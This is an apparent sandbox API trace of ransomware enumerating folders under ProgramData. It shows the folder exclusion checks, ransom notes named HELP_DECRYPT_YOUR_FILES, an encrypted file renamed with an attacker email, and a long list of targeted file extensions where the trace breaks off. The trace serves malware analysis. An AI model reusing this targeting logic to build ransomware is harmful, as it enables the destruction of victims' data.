	[0175.224] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.225] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0175.225] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.225] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0175.225] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.225] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0175.225] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.225] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0175.225] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.226] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0175.226] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.226] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0175.226] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.226] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0175.226] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.226] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0175.226] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.227] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0175.227] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.227] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0175.227] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.227] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0175.227] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.228] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0175.228] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.228] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0175.228] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.228] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0175.228] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0175.228] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0175.228] FindNextFileW (in: hFindFile=0xfb9570, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x81f840c7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x310031, dwReserved1=0x7d0063, cFileName="..", cAlternateFileName="")) returned 1
	[0175.228] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0175.229] FindNextFileW (in: hFindFile=0xfb9570, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81f5dfd9, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x81f5dfd9, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x81f840c7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x310031, dwReserved1=0x7d0063, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0175.240] FindNextFileW (in: hFindFile=0xfb9570, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81f5dfd9, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x81f5dfd9, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x81f5dfd9, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x310031, dwReserved1=0x7d0063, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0175.241] FindNextFileW (in: hFindFile=0xfb9570, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb50367, ftCreationTime.dwHighDateTime=0x1d112b1, ftLastAccessTime.dwLowDateTime=0xeb50367, ftLastAccessTime.dwHighDateTime=0x1d112b1, ftLastWriteTime.dwLowDateTime=0xeb765cf, ftLastWriteTime.dwHighDateTime=0x1d112b1, nFileSizeHigh=0x0, nFileSizeLow=0x2a5, dwReserved0=0x310031, dwReserved1=0x7d0063, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0175.241] FindNextFileW (in: hFindFile=0xfb9570, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb50367, ftCreationTime.dwHighDateTime=0x1d112b1, ftLastAccessTime.dwLowDateTime=0xeb50367, ftLastAccessTime.dwHighDateTime=0x1d112b1, ftLastWriteTime.dwLowDateTime=0xeb765cf, ftLastWriteTime.dwHighDateTime=0x1d112b1, nFileSizeHigh=0x0, nFileSizeLow=0x2a5, dwReserved0=0x310031, dwReserved1=0x7d0063, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 0
	[0175.241] FindClose (in: hFindFile=0xfb9570 | out: hFindFile=0xfb9570) returned 1
	[0175.241] FindClose (in: hFindFile=0xfb9570 | out: hFindFile=0xfb9570) returned 0
	[0175.242] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81e78ff2, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x81e78ff2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x81e78ff2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x1c0, dwReserved0=0x310031, dwReserved1=0x7d0063, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 1
	[0175.242] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81e78ff2, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x81e78ff2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x81e78ff2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x1c0, dwReserved0=0x310031, dwReserved1=0x7d0063, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 0
	[0175.242] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0175.242] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0175.242] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcd9e222, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0175.243] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0175.243] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0175.243] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{ee4aac98-c174-4941-82b1-d121e493e4fb}", cAlternateFileName="{EE4AA~1")) returned 1
	[0175.243] lstrcmpW (lpString1="{ee4aac98-c174-4941-82b1-d121e493e4fb}", lpString2="..") returned 1
	[0175.243] lstrcmpW (lpString1="{ee4aac98-c174-4941-82b1-d121e493e4fb}", lpString2=".") returned 1
	[0175.244] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning") returned="C:\\Users\\All Users\\Microsoft\\Provisioning"
	[0175.244] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\"
	[0175.244] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\", lpString2="{ee4aac98-c174-4941-82b1-d121e493e4fb}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}"
	[0175.244] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}"
	[0175.244] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\"
	[0175.245] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\"
	[0175.245] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*"
	[0175.245] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0175.250] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*") returned 84
	[0175.250] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.250] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*") returned 0x54
	[0175.250] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.250] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="windows") returned 0x0
	[0175.251] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.251] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="boot") returned 0x0
	[0175.251] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.251] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="system volume information") returned 0x0
	[0175.251] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.251] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0175.251] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.252] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="temp") returned 0x0
	[0175.252] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.252] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="program files") returned 0x0
	[0175.252] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.252] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0175.252] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.252] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="appdata") returned 0x0
	[0175.253] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.253] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="application data") returned 0x0
	[0175.253] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.253] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="winnt") returned 0x0
	[0175.253] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.253] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="tmp") returned 0x0
	[0175.253] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.254] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="cache") returned 0x0
	[0175.254] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.254] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0175.254] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.254] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="webcache") returned 0x0
	[0175.254] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.254] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="inetcache") returned 0x0
	[0175.254] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.255] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="nvidia") returned 0x0
	[0175.255] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.255] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="packages") returned 0x0
	[0175.255] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.255] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="cookies") returned 0x0
	[0175.255] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.255] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpSrch="programdata") returned 0x0
	[0175.255] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdc44d0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdc44d0, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdc44d0, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0175.256] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa18f51ef, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa18f51ef, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa18f51ef, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x71d, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1
	[0175.256] lstrcmpW (lpString1="customizations.xml", lpString2="..") returned 1
	[0175.256] lstrcmpW (lpString1="customizations.xml", lpString2=".") returned 1
	[0175.256] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\"
	[0175.256] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\", lpString2="customizations.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml"
	[0175.256] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml") returned 99
	[0175.256] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.256] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml", cchLength=0x63 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml") returned 0x63
	[0175.257] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.257] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0175.257] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml"
	[0175.257] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml") returned 99
	[0175.257] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.257] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.258] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0175.258] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.258] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw